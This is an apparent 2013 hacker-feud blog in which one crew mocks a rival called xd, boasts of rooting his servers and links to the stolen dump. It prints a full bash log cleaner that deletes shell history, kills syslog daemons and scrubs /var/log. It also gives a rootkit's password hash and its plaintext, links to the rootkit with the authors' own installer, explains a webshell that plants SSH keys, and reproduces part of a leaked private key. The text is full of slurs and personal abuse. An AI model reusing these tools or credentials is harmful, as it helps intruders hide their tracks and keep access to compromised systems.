Thursday, August 29, 2013

xd the faggot gets owned and rm'd, tries to deny it.

After rooting xd's shellbox, two of his ircd nodes, and corny's (xd dickrider) box, we've decided to publish the ownage here for you wonderful ladies and gentlemen who have been following our blog.

link: https://mega.co.nz/#!yUFAHAqA!X5BxhAmHEs6Wf0mkp_0doFYCTfgl57nJ6hgzF7AS2_8
mirror1: http://www.sendspace.com/file/pp4u8r
mirror2: http://xq74epoqlyeufi7m.onion/xdgotowned.tar.bz2

Predictably, xd immediately denied being owned by us, claiming that the boxes were honeypots setup by him all along. We'll allow you to be the judge of that.

http://valhalla.allalla.com/2013/08/response-to-the-yet-again-non-ownage-of-haqnet-and-dont-worry-i-will-respondmuch-more/

Anyhow, there is no ownage of Haqnet … as tropic would well know… i dont keep linux boxes, well, not under any of my handles/nicks, etc…

I don't think it gets any more asinine than this folks, xd can insist on living in his own little fantasy universe, but it won't change the fact that he got owned.

you can believe what you like, and understand this… I dont give a flying shit about who u are, but if you been busted…and then come at me, its called protecting myself… wizards box, was one big honeypot…and why didnt troppic already have root ??? coz, i didnt… it was a node, pwnd node… like the other piece of crap box...

This box (or more accurately, vps) which you paid USD $5.00 a month for is a "pwned node"? Your idiocy and lack of skills made it easy enough to root it.

to be continued… wen u will see, what happens,wen u fk with people, who you should have dealt with… u knew what was going on and were loling…

The usual threats. Unlike you, xd, we actually carry ours out.

so what now ??
now is MY turn to play your games…since u have given me NO choice…so expect, to be owned…. skid.

Sure.
 

Tuesday, August 27, 2013

Lulz: xd is delusional and thinks he can own Apache/xd's telnet bug

Just when you think xd can't sink any further into the depths of stupidity, he surprises you with this:

http://valhalla.allalla.com/2013/08/htp-owned-x2-enjoy-my-french-kiss-rf/ 

seems after 2 weeks, and a CRAP load of ddos from these lamers… was time to attack, again… this time i found a neat way thru telnet bug on debian… to do some fun stuff… here is the reason, or oneof them…and here is my reply….

[09:29am] <~xd> wat total lamers
[09:29am] <~xd> not even efnet has such skids
[09:29am] <~xd> thts saying alot
[09:31am] <~xd> ]# telnet ipv6.nullstate.se 80
[09:31am] <~xd> Trying 2001:470:c2cd::6667…
[09:31am] <~xd> Connected to ipv6.nullstate.se.
[09:31am] <~xd> Escape character is ‘^]’.
[09:31am] <~xd> hihi
[09:31am] <~xd> <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
[09:31am] <~xd> <html><head>
[09:31am] <~xd> <title>501 Method Not Implemented</title>
[09:31am] <~xd> </head><body>
[09:31am] <~xd> <h1>Method Not Implemented</h1>
[09:31am] <~xd> <p>hihi to / not supported.<br />
[09:31am] <~xd> </p>
[09:31am] <~xd> <hr>
[09:31am] <~xd> <address>Apache/2.2.16 (Debian) Server at ipv6.nullstate.se Port 80</address>
[09:31am] <~xd> </body></html>
[09:31am] <~xd> Connection closed by foreign host.
[09:31am] <~xd> abnnoying centos
[09:31am] <~xd> ah debian
[09:31am] <~xd> centos gives it str8 away
[09:32am] <~xd> # telnet ipv6.nullstate.se 80
[09:32am] <~xd> Trying 2001:470:c2cd::6667…
[09:32am] <~xd> Connected to ipv6.nullstate.se.
[09:32am] <~xd> Escape character is ‘^]’.
[09:32am] <~xd> POST rm -fr /
[09:32am] <~xd> catch yas
[09:32am] <~xd> lol
[09:32am] <~xd> they running apache on /
[09:32am] <~xd> silly
[09:32am] <~xd> <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
[09:32am] <~xd> <html><head>
[09:32am] <~xd> <title>408 Request Time-out</title>
[09:32am] <~xd> </head><body>
[09:32am] <~xd> </head><body>
[09:32am] <~xd> <h1>Request Time-out</h1>
[09:32am] <~xd> <p>Server timeout waiting for the HTTP request from the client.</p>
[09:32am] <~xd> <hr>
[09:32am] <~xd> <address>Apache/2.2.16 (Debian) Server at ipv6.nullstate.se Port 80</address>
[09:32am] <~xd> </body></html>
[09:32am] <~xd> Connection closed by foreign host.
[09:32am] <~xd> dead
 

whats matter… nomore boxes left for me to kill ?? oh darn, i feel so sorry for u,… i doooo….

After reading this, I feel more sorry for xd than ever. He's under the impression that he just rm'd somebody, by using telnet to send HTTP request headers containing arbitrary commands!

POST rm -fr / HTTP/1.1\r\n

The very idea that Apache could be so easily exploited is ridiculous, yet xd seems to believe it. Sadly, xd didn't even format his HTTP request headers properly, and as expected, his request got timed-out. True to his delusional and idiotic nature, xd interprets the HTTP response as the result of him rming the server, which never happened, nevermind the fact that / refers to the httpd's root dir and not the root dir of the box itself. It's also hilarious that xd thinks that this bug exists let alone has something to do with telnet (I suppose using telnet makes him feel like a leet hecker, which he will never be). It has become evident that xd is past the point of no return and beyond salvation, and it isn't surprising given the extent that xd will lie to himself in order to rationalize his absurd and idiotic decisions. My recommendation to him is to stop blogging and embarrassing himself any further.

[09:25am] <~xd> sure
[09:26am] <~xd> hiding behind a monitor making physical threats to someone who would crush them with left arm alone. tough


I find that utterly ironic. The authors of this blog have received numerous death threats and threats of physical violence (however improbable) from the likes of xd. More on that later...

 …. adios …..
if your a lamer, then oneday, u to can have my rm -french kiss ;) love ya…
another haqnet production…
xd

Fjear the xd! He has 0day Apache exploits and he will rm you!

xd reposts exploit code from 2003, exposes own ignorance

Just another example of xd's penchant for posting really old exploits coded by others:

http://valhalla.allalla.com/2013/08/exploit-samba-2-2-bruteforcer-root-exploit-x86/

Dont quote me on this, but, i KNOW 99% there is a few bugs within samba 2.2.* still, and, glancing over some codes today oprettymuch confirm it for windows, and, i decided, why include an exploit, when the best attack (linux) wise, is to bruteforce the leading bit, and subsequently, overwrite the evil c0de left by its devs..and, it is alwatys at prettymuch same place…so hey, whynot..if cant brute this then, you can use a different attack…wich, i cannnot release YET, but, will as soon as i get the o.k from the authors who, seem to wish it pvt… i aready did have a version, but, not ‘the’ new version…so, will sit on it and just say one thing, there iS bugs in smb 1 and smb2 trans() area, wich is, moreso for win32 but, still there for many linux…so, enjoy..
HaqNET

Yes, well, all this shows is xd's lack of progress more than anything else, as he's still trying to exploit samba 2.2.*, when the stable version of samba (at the time of this post) is 4.09.

Furthermore, xd seems unaware of modern exploit prevention methods such as ASLR and NX stack. Xd thinks that the address of the nopsled will always be static, and disregards the fact that returning to an address in a nopsled is a technique which will fail on almost all modern operating systems.

Especially laughable is how xd tries to save face by claiming that if the obsolete exploit fails, he has a private version of the exploit which he somehow cannot release (nevermind that the vulnerability is public and disclosed in 2003).

xd selling ripped/ancient exploits

Drew the big bad biker


It's bad enough that xd copies and pastes other peoples' code and calls it his own,  now he's trying to sell it:

http://valhalla.allalla.com/2013/08/php-and-elenore-exploit-packs-sale/

Yea yea yea…
    i need cash, afterall, harley davidson is NOT cheap!
Selling :
- any and all skanner packs…and some never rlsd, nor seen by human eyes!
- elenore exploit pack, modified to invlude some nice stuff
- crimepack and some of its mods
- many many unnamed ones,but found in wild,ie; honeypotted and caught, for exploits only…
- sara expl pack
- MANY variations of mpack, and icepack, and many, many different bot/expl packs,wich are almost similar, but all seem to have own nice qualities…but mainly is, the amount i have, prettymuch will sell mutiples, for one price…ie; my elenore is NOT backdoored, so, its worth 5k usually… id be happy to combine it with some updated exploits…and yea, some are even my own… deopending on what u want to spend…
i have done nets for awhile, and unless u get a proper, or, a few versions, u will never get them to work… trust me on this…10yr botnet still running*
anyhow, if u want me, u know were to find me OR doomxd@gmail.com or my ircd @ irc.haqnet.net SSL ONLY port 31337 #Haqnet! and yes there is ipv6.haqnet.net also! thankyou..

Ok Drew, once again, you're not fooling anybody. It isn't a coincidence that all the exploit packs you're selling were all already leaked, and not only that, you also insist on selling shit from six or seven years ago like mpack and icepack. But I suppose xd will do anything to support his druggie habits.


Sunday, August 18, 2013

Short analysis of the sebd rootkit, ("xd's version")

What xd doesn't understand is that, he will always be 1000 steps behind us :)

Awhile ago ocean gave a list of roots out in haqnet. Knowing that xd would deploy his 'super leet rootkit' that he brags about, we decided to log ssh on some of the boxes. Leaving/being banned from HaqNET, we waited a month or so. As expected, several of the boxes were dead due to xd's lack of stealth. After joining ircd for what, the 2nd time after being banned for asking for the challenge, ocean decided it was time to trick this idiot ^_^,  more on this in the upcoming post, but essentially ocean irc'd with a root that we knew was still up, and probably kitted by xd. He felt so powerful when he logged in, and ran yum update, LOL, well, thanks to his stupidity, we have this information, oh, and he even admits that ocean ended up rming that box right after, so uh, who actually got owned here..?

Information on xd's methods of being stealthy/keeping ax to compromised boxes:

he rm'd tons of shit, such as /var/log/*, super stealthy man

three new users added: 

adms
daemons
strace
 

an example entry from shadow (didn't bother cracking it):

strace:h3bCsDM35lQY6:15874:0:99999:7:::

And well, we guess the shit-kit failed, so he had to ssh into the box,

adms:thesecret404 <--- LOL NICE

And the home dirs of the users were set to /var/lib, each one of them had a set-uid binary named 'su' in their dirs, once again, talk about stealth!

an example:

/var/lib/strace/su <--- 4755 (u+s/setuid)

his super leet rkit was deployed on the box:

We were excited to recover his rootkit, it was supposed to be fun to pwn it, we were sadly mistaken. The rootkit was just a modified version of a kit romanian script kiddies use (originated around 2003).

*notes:
  • Creates several files with hardcoded names (rkhunter/chkrootkit, anyone?)
  • Uses some form of encryption, sniffs packets on the compromised system
  • Always sends reverse shells to the same hardcoded port 43333
  • Uses DES crypt "hashes" for its password. This is kiiiinda hardcoded but we can sed it out LOL, if you were curious, the hash was "crnGtapg9Zb6I", and the plaintext result of that was "103-craz". xd doesn't realize that DEScrypt limits you to 8 chars.
  • We're guessing, and hoping, the source code for this has a little config.h or something that lets us change these things
To mock Drew we decided to relay/mirror this kit with a new install script to the common script kiddie hangout site known as hackforums, what's sad is that some of them have more skill than xd.

xd, why do you even try to act like you have knowledge, you name your github "x90", yet you probably don't understand the role of NOP in exploits/code in general. That being said, it is amazing the guy has the audacity to talk shit on a decent backdoor PoC.

https://github.com/x90/ssh_rape

"A c00l kit ???
but, were is, logging into, maybe OPEN tcp ports...etc etc.... you should look @ sebd (id b happy to give u copy...) , and sshtrix 9via noptrix...0 , maybe adding some extra functionality, would b cool... but, i dont know.... it is sofar, a very good method, BUT, not as good as, the one i use :> xd"

This is blasty @ fail0verflow's PoC that he showed off @ hackinthebox, it is 100x better than sebd, why would it log, it's a PoC, logging is a feature the coder would implement to weaponize this, the 'method' is kinda old, however, it is MUCH better than the piece of shit you use, stop acting like you are the latest and greatest, you have no cool w4r3z.

https://github.com/blasty
www.hackintherandom2600nldatabox.nl/archive/slides/2012/blasty.pdf

^ you should attempt reading that xd

Link to sebd (original w/installer) + sebd ( xd's version + our own installer, [incase you actually want to try this piece of shit out] )

Original sebd: http://easkytb.3host.ro/phrame.php?action=saveDownload&fileId=21576

xd's sebd + our installer: http://www.multiupload.nl/0ZIB0QCBL3

Thanks for reading!

Terrible code - produced by xd!

Just to show you how bad xd's code is..

http://valhalla.allalla.com/2013/08/sabre-bash-log-cleaner-haqnet/

Of course, knowing this idiot, we guessed the password (1st try, lol..), so, the password is: haqnet

TL; DR, this 'cleaner' rm/fills /var/log/* <-- xd's definition of stealth, LOL

The code is hideous, and from the looks it won't really work either, it also attemps to remove ancient kits such as tuxkit, since 2002 is the only shit xd is capable of pwning with his romanian 0day scripts [more on that soon] we do not recommend anyone to use this piece of shit.

Thanks for reading.

#!/bin/sh
# SABRE – BASH BASED LOGCLEANER (Based on Sauber so a befitting name)
# Usage: sauber <string>
# NOTE: Feel free to change/edit or update this and send it back to us admin@crazycoders.com !
#       Remeber,this WONT do your job completely for you,and i DID leave out some kits,this
#       kit-remover was borrowed then updated due to times-a-changin ,enjoi
#       or hit us up on irc.haqnet.net (SSL-ONLY) Port 31337 join #Haqnet // CrazyCODERS.COM // [HaqNET]
#########################################################################################################

kill -9 -0

BLK=’ [1;30m'
RED=' [1;31m'
GRN=' [1;32m'
YEL=' [1;33m'
BLU=' [1;34m'
MAG=' [1;35m'
CYN=' [1;36m'
WHI=' [1;37m'
DRED=' [0;31m'
DGRN=' [0;32m'
DYEL=' [0;33m'
DBLU=' [0;34m'
DMAG=' [0;35m'
DCYN=' [0;36m'
DWHI=' [0;37m'
RES=' [0m'

echo "[+] ${BLK}* ${DWHI}Cleaning the mess.. may take some time depenz on size of the logs.${RES}”
echo “unset HISTFILE” >> /root/.bash_profile
echo “unset HISTSAVE” >> /root/.bash_profile
echo “unset HISTFILE” >> .bash_profile
echo “unset HISTSAVE” >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
chattr -R -ASacdisu /sbin /bin /usr/bin/ /usr/sbin/ /usr/local/bin/ /usr/local/sbin/

WERD=$(/bin/ls -Faloh /var/log | grep -v “lastlogin” | grep -v “/” | grep -v “*” | grep -v “.tgz” | grep -v “.gz” | grep -v “.tar” | grep -v “lastlog” | grep -v “utmp” | grep -v

“wtmp” | grep -v “vtmp” | grep -v “xtmp” | grep -v “@” | grep -v “.txt” | grep -v “b.pl” | grep -v “scan.txt” | grep -v “.txt.php” | grep -v “.php.gif” | grep -v “mfu.txt” |

grep -v “bios.txt” | grep -v “sort” | grep -v “ips” | grep -v “ipsort” | grep -v “a.txt” | grep -v “IRC” | grep -v “[SSH]” | grep -v “scan.txt” | grep -v “mis.php” | grep -v

“php://input” | grep -v “got root”| grep -v “[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep -v

"byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

WERDZ=$(/bin/ls -Faloh /var/log/security | grep -v "lastlogin" | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp"

| grep -v "wtmp" | grep -v "vtmp" | grep -v "xtmp" | grep -v "@" | grep -v ".txt" | grep -v "b.pl" | grep -v "scan.txt" | grep -v ".txt.php" | grep -v ".php.gif" | grep -v

"mfu.txt" | grep -v "bios.txt" | grep -v "sort" | grep -v "ips" | grep -v "ipsort" | grep -v "a.txt" | grep -v "IRC" | grep -v "[SSH]” | grep -v “scan.txt” | grep -v “mis.php” |

grep -v “php://input” | grep -v “got root” | grep -v “[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep

-v "byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

for fil in $WERD
do
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}..${RES}"
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
#echo "${WHI}$linedel ${DWHI}lines removed: [/var/log] ${RES} ..”
#done
for filz in $WERDZ
do
linex=$(wc -l /var/log/security/$filz | awk -F ‘ ‘ ‘{print $1}’)
echo -n “${BLK}* ${DWHI}Cleaning ${WHI}$filz ($linex ${DWHI}lines${WHI})${BLK}..${RES}”
grep -v $1 /var/log/security/$filz > newx
touch -r /var/log/security/$filz newx
mv -f new /var/log/security/$filz
newlinex=$(wc -l /var/log/security/$filz | awk -F ‘ ‘ ‘{print $1}’)
let linedel=$(($linex-$newlinex))
echo “${WHI}$linedel ${DWHI}lines removed: [/var/log/security] ${RES} ..”
done

##remove known rootkits
echo “${C1}#${E} Checking for kitZ ..”
if [ -d "/dev/tuxkit" ]; then
rm -rf /dev/tuxkit
rm -rf /dev/tux*
fi
if [ -d "/dev/fdg" ]; then
rm -rf /dev/fdg
rm -rf /dev/fdg*
fi
if [ -d "/dev/.hijackerz" ]; then
rm -rf /dev/.hijackerz
rm -rf /dev/.hijack*
fi
if [ -d "/usr/src/.puta" ]; then
rm -rf /usr/src/.puta
rm -rf /usr/src/.puta*
grep -v /usr/src/.puta /root/.bash_profile > /tmp/.lock-01002231292
touch -acmr /root/.bash_profile /tmp/.lock-01002231292
mv -f /tmp/.lock-01002231292 /root/.bash_profile
rm -f /tmp/.lock-01002231292
rm -f /tmp/.lock-010022*
fi

echo “unset HISTFILE” >> /root/.bash_profile
echo “unset HISTSAVE” >> /root/.bash_profile
echo “unset HISTFILE” >> .bash_profile
echo “unset HISTSAVE” >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
echo “[!] ${BLK}* ALL Done -> exiting ..”

skid-alert: xd can't understand the basicz

Alright, so I suppose it is time to go show one-by-one how each one of xd's posts are retarded. The first post we are going to be talking about:

http://valhalla.allalla.com/2013/08/htp-owned-by-xd-haqnet/

We are in no way affiliated with aush0k, etc.

"OK, I GOT TOLD BY THE OWNEES THAT THIS IS PHP KEY CRYPTOGRAPHY ….FUNNY COZ IT SEEMS LIKE PLAIN OL TEXT TO ME.. :S ;) OWNED..AGAIN
anyhow… here, is some fun things you may wish to do, when you find that these kids ie; ocean ,calling me a lamer, because i FIX crippled exploits…well, in this online Fuhosin shell i found, it was really pathetic..and, handed me theyre login keys, login passes, and RSA PRIVATE key ..and there is plenty more if you goto :"

First off, excellent grammar, second off, I'd love for him to explain how we're owned? It is quite obvious he doesn't understand how cryptography works, and he couldn't even understand how the 'fuhosin' webshell works. He also links to a shell that is just text file due to someone's failed upload (trying to change extensions, etc). He also claims to 'fix crippled exploits'. This one made us chuckle, here are a few samples of his 'fixing'

http://pastebin.com/Ns5YPrF7
http://pastebin.com/3WhtpdEc
http://pastebin.com/3yvfMChr
http://pastebin.com/Csp1Z1AZ
http://pastebin.com/K1yWwbT6

he has 'fixed' other exploits too, but I didn't bother saving them, anyone with basic knowledge of kernel architecture, decent low level programming can fix an exploit; sadly xd posses neither. So if we take a look at these 'fixed exploits', it is quite evident all he is doing is pasting some code, bullshitting comments, and claiming they are now better/fixed. People who have talked to xd before and left, because they know he's an idiot also know that he has no programming skills what-so-ever.

"## ok so we see later, the ssh pass being set to ‘dongpass’ ,BUT when you have the pvt keyfile,and, know now, how to dismantle this little shell.. well…
theyre latest claim to fame, is beeimg.com , lol, wich, is a joke… my claim to fame, was owning nasa at 13yrs of age..but yea, ‘ocean’ was quick to call me a has been.. and, i am actually, the ONLY person who is hanging onto a VERY awesome local root,BUT,since it rocks,and, since i found myself 100% ,i would LOVE a version wich will spawn root, yes, EVERY kernel, EVERY protection, and even bsd’s@! NOTHING can save from this… until, it is disclosed…and since i tried, to disclose many times thru FD lists, and was laughed at and, called another person…well, i would have happily worked with them, and, i would still, BUT, there would be a VERY strict agreement around this exploit.. and, it is NOT as simple as it seems, to  spawn a shell..due to the nature of the binary,..wich, i will release, soon as it is a complete p0c ,and not a one-liner as it is now.."

        This guy is pure comedy, we will show you what he's trying to talk about, but first, let's address the other parts of his statements. Where did we claim that site to be our fame? Bouncing off of a box to your ircd is claiming fame? Back when xd was 13, (the 80s or so), owning NASA was not hard, ironically it's still not hard today, running java (ahem coldfusion), jsp, and tons of flawed cgis and more makes it quite an easy target to own, that being said, with the skill portrayed from xd, one would highly doubt he pwnd NASA.

       Okay, he is hanging on to a local root (mind you this guy doesn't understand the difference between ring0/ring3 or userland vs kernel), he claims he has a 'local root', but then says he would love a version that spawns root...Ok, in that case we all have local roots, they just don't spawn root. That makes absolutely no fucking sense, unless he has some sort of a bug which allows you to edit root owned files, in which case he could temporarily addhimself to sudoers, edit passwd/shadow, edit a suid bin, add his public key into a privileged users home? If you have a vuln like that and didn't even think of that type of shit, then it is likely it isn't your bug :P, however with the lack of friends xd has it is doubted he possess any such bug. Hangon, you call yourself a blackhat, but then want to disclose this to full disclosure? Of course you were laughed at, you have no fucking idea what you're saying, LOL.
function chippy_udp_reverse($ip,$port) { // Yeah, I copied and pasted and str_replaced the one above. Sue me. ~ Aurora    
" ^^ so, they want, to copy/paste..then later…"

First off, it is copy pasting from the code above that line, what is xd trying to prove here?
function kolang_reverse($host, $port) { // PHP 4.3.10 – 5.3.0 Safe Mode bypass exploit – CVE-2009-4018 // fuck you IHSteam dont cripple your sploits    
"^^ I was teased about ‘fixing’ NON root/d0s based stuff..wich, sometimes, is NOT me fixing atall.. as with the latest root expl ‘hemlock.c’ wich is seen as a d0s ,i was only sent, the working local root version..wich, i will post, soon..
now, on with our pwnage of theyre shell,wich, i believe theyre now using my own ideas,or, trying LOL, and, i mean, they have some php.ini overwrite ‘bypass’ ,now correct me if im wrong, but, the two things wich is breaking things, is silly shit like this… the second you start to act like this, and overwrite, i clearly know you have not even looked at php -help ! php -n == ignore ALL ini files , and execute code"

Ok, Drew, stop crying about being teased, first off, you wouldn't know the first place to start in writing a kernel exploit, no one, unless they are as feeling generous as fuck or on crack would send you a decent exploit, you claim to release it soon, it's been a while, where is it? Don't fabricate bullshit. This shell has been around for a year or two, no one took your lame ass ideas, the overwriting of php.ini is a classic trick to circumvent shit; clearly your dumbass doesn't understand php or hacking whatsoever.

"php -n == ignore ALL ini files , and execute code"

Hey dumbass, do you understand what CLI is? php -n is a command line option to ignore php.ini. The webshell allows us to exec code, if we had cli, who would care about any of it?

"## ok so we see later, the ssh pass being set to ‘dongpass’ ,BUT when you have the pvt keyfile,and, know now, how to dismantle this little shell.. well…"

The ssh pass is not being set to 'dongpass', that is just the form name..Don't believe me?

https://gist.github.com/redhat69/3903275/raw/bdf5ff9789445cab8c485d2a45e759d4660b6429/gistfile1.txt
function login() { // keep lam3rz out  
echo "<title>ah ah ah, you didn't say the magic word!</title>  
<body bgcolor=\"black\"><table border=0 width=100% height=100%><td valign=\"middle\"><center>  
<form action=".basename(__FILE__)." method=\"POST\">  
<input type=\"password\" maxlength=\"32\" name=\"dongpass\">  
</form>  
</table>"; }   
the html field name = dongpass, hi, yes how is that a password?

"now on with the HTP lol@..

add our SSH public RSA keys to the list of authorized ones $pk = “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9itZ/PPfGNn2PArA94f0bTP/Mpz2aRo6eLMgdexoJQ++ToWndXgxs3KzQCLza2mICHiH+nNNaa+PmEjnppHJGk3Rb8vtR8ojirpXvdcaRI+on/zPkGJB54c123IN0jwVPFFjCvCQQNpZtpBQMoeXYRTNNmX6lif1uuCm5LjxfPOR2lRG0dNIVW5SsAiuhXBRNWguVN/ctuKK2MhLWJ31HnGk4g2Qv0270sb4BSpkcQRGX6ZitN5KHnS12sjtvvfc/h5vn0bzt5YP4rA4NTwWEGeLxABzCvW9hXL+b3D9XLhP6alE6HOgJNT+TATRjnFScfrdBd91XPso0dD1FcXRv fuck@suhosin”; $home = get_home(); @mkdir($home.”/.ssh”); if(file_exists($home.”/.ssh/authorized_keys”)) { $ak = file_get_contents($home.”/.ssh/authorized_keys”);

and wala…

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9itZ/PPfGNn2PArA94f0bTP/Mpz2aRo6eLMgdexoJQ++ToWndXgxs3KzQCLza2mICHiH+nNNaa+PmEjnppHJGk3Rb8vtR8ojirpXvdcaRI+on/zPkGJB54c123IN0jwVPFFjCvCQQNpZtpBQMoeXYRTNNmX6lif1uuCm5LjxfPOR2lRG0dNIVW5SsAiuhXBRNWguVN/ctuKK2MhLWJ31HnGk4g2Qv0270sb4BSpkcQRGX6ZitN5KHnS12sjtvvfc/h5vn0bzt5YP4rA4NTwWEGeLxABzCvW9hXL+b3D9XLhP6alE6HOgJNT+TATRjnFScfrdBd91XPso0dD1FcXRv fuck@suhosin

bahahaha… no not ONLY this but…heck…when you have this ;

—–BEGIN RSA PRIVATE KEY—–
MIIEowIBAAKCAQEAvYrWfzz3xjZ9jwKwPeH9G0z/zKc9mkaOnizIHXsaCUPvk6Fp 3V4MbNys0Ai82tpiAh4h/pzTWmvj5hI56aRyRpN0W/L7UfKI4q6V73XGkSPqJ/8z 5BiQeeHNdtyDdI8FTxRYwrwkEDaWbaQUDKHl2EUzTZl+pYn9brgpuS48XzzkdpUR tHTSFVuUrAIroVwUTVoLlTf3LbiitjIS1id9R5xpOINkL9Nu9LG+AUqZHEERl+mY rTeSh50tdrI7b733P4eb59G87eWD+KwODU8FhBni8QAcwr1vYVy/m9w/Vy4T+mpR OhzoCTU/kwE0Y5xUnH63QXfdVz7KNHQ9RXF0bwIDAQABAoIBAHZUQMi6dSznQ8eO NBzOAseScHeBSPIRbmPNLTlKatyx7tVJhd/PIQ6tTa2qZsxyXZFY4nwjx8bBaEtv wXvdUAJDd/cXYFKuiUqLF8ugyVA/DaXeqrSRqVCN6Ul1LRQNXZEa8LbR4enFSnA0 aNfiEq3LtdWSKACMfw0qJ9IVzVbehXM8fk1hpCbqAFxg1IcKbWmopQCgtdsLS/gz rWYjMzl327TeJGtbTZvwIw0ASWx0y09BQVQGWOzH9zM5pqF0IKYP+MmeCIxpJKXu GIPMRuXor1cv8j08z79JqT14bkrOSmSeaGmsDpodqgqQuxi2NNDt26u70m9YyjU7 L/8G+nECgYEA+/lvmCQGFN4fvZe/m1t8wF44NwmoQNuEU0Mwd1U9yQbylQflHb5m da9rzsMRAwBnjoAjG1e4985IdbzPkrnv8T9ZxqW/O/YCFAYbqDQZCFmYQQYeZCo0 2h+xIRScwrw2ZqyPp1F8BGXD5n4s4icvuKiuUXS/N5+ko7dx3YEzBKsCgYEAwJIO xvoWzkgNOta7xN7M94egx/xQlpl6KE70m
—–END RSA PRIVATE KEY—–
BUT theyre worst errors, are simple.. they use simple passes, ie; ‘fuhosin’ for theyre webshell logins…and they call me, outdated..yet, use a fucking pathetic HTP-modified version of Fuhosin (can be found on my github.com/x90 …

NOW for sshd …seems, theyre even stupider,and, they maybe, forgot how md5 works ??? lol…
if(isset($_POST['dongpass']) && !empty($password)) {
if(strlen($password) == 32) {
$_POST['dongpass'] = md5($_POST['dongpass']);
}
if($_POST['dongpass'] == $password) 
setcookie(“dongs”, $_POST['dongpass'], time()+3600);
} else {
echo “”;
}
reload();
}
Challenge removed, only PROS will be considered.

CANNOT CODE EVEN A HELLO WORLD! ,AND OCEAN, I DIDNT STEAL YOUR SHIT.. IT IS, ANYONE COULD HAVE,AND, I DONT USE THEM…

they are born of narq, and, the ONLY person id take that back on is the kid ac1d , from bluehell.org ,whom, seems to, well.. not hang with the miscreant,low iq’d ‘ocean’ … anyhow, the challange is there.. id even give you, local, unrestricted ax, just to watch you fail in YOUR attempt…as all wargames, i would have to give you a shell, to try win the ‘war” ,right ? well, my one, wont be logging, and wont be a root…and, if i was some narq, id be doing what theyre doing now,wich is, trying to have me arrested..
and whoever owns beeimg.com , i feel sorry for you ;) (your owned x5)…"

Congrats, you don't understand jack shit! The keys in fuhosin are used as a method to bypass anything stopping code execution, this is trivial but I'll give you a small explanation, xd, listen, maybe you'll learn something? Doubt it :P

It adds a pubkey into the user's .ssh folder, so assume we can't exec code, normally, and say we're running as the user 'bob', well, the shell will attempt to add a key into /home/bob/.ssh, then use a ssh-like lib to use that as a method of execution. Regarding 'sshd', you're completely off, it has nothing to do with that, and it seems you can't read basic code, dongpass, it's passing an md5 val, it checks it, if it's correct/matches we login and 'wala'. Challenge removed? LOL, we came into your lame ircd, asked for your challenge, and got banned in return, can't support your claims so you removed it, huh?

Oh, we can code a hello world ez pz, but xd can't :P. He talks of us being born of narq, but then he says he'd take ac1d, aka a KNOWN narq, federal informant, etc..ironic..."Low iq'd ocean"..hahahaha, let me, ocean give you a lesson on IQ.

 [        First off, I (ocean), have taken several tests, from Welschier to Wisk to Stanford-binnet, on the typical IQ scale, where 100 is average, I score around 147, which in theory puts me @ the tier of a genius. If you call that low, you don't understand what you talk about, second off, the whole concept of a number to represent/measure someone's intelligence is absurd, just like the concept of the bell curve, something that is deprecated. The whole idea behind IQ was first created to see if someone was a plain out retard (such as yourself, xd) or if someone was average (this was during the war). Now the reason that it is absurd is because IQ tests don't measure every single aspect of the human brain, for example, someone may be much more talented naturally in arts vs a more logical or mathematical brain. The bell curve brings race into the game, and there are no significant, *note (non-biased) studies that support that race plays a factor/role in intelligence. If you want to argue with me, (xd), I recommend you read a bit of Chomsky's work, the book 'the bell curve', and misc things that will help you understand the human brain. Feel free to correct me, because I don't take offence to expansion of knowledge.

~ schooled by ocean ]

Once again, we asked for your shell for the challenge, you didn't give it, you just talked more shit. Trying to have you arrested? Why would we waste time trying to get an inferior scum like you arrested? You make me chuckle, oh, you owned beeimg.com too? Weird, you said that back when I was on ircd, I told you rm it, and you didn't? Yeah, talking more shit as usual, cute.

Thanks for reading.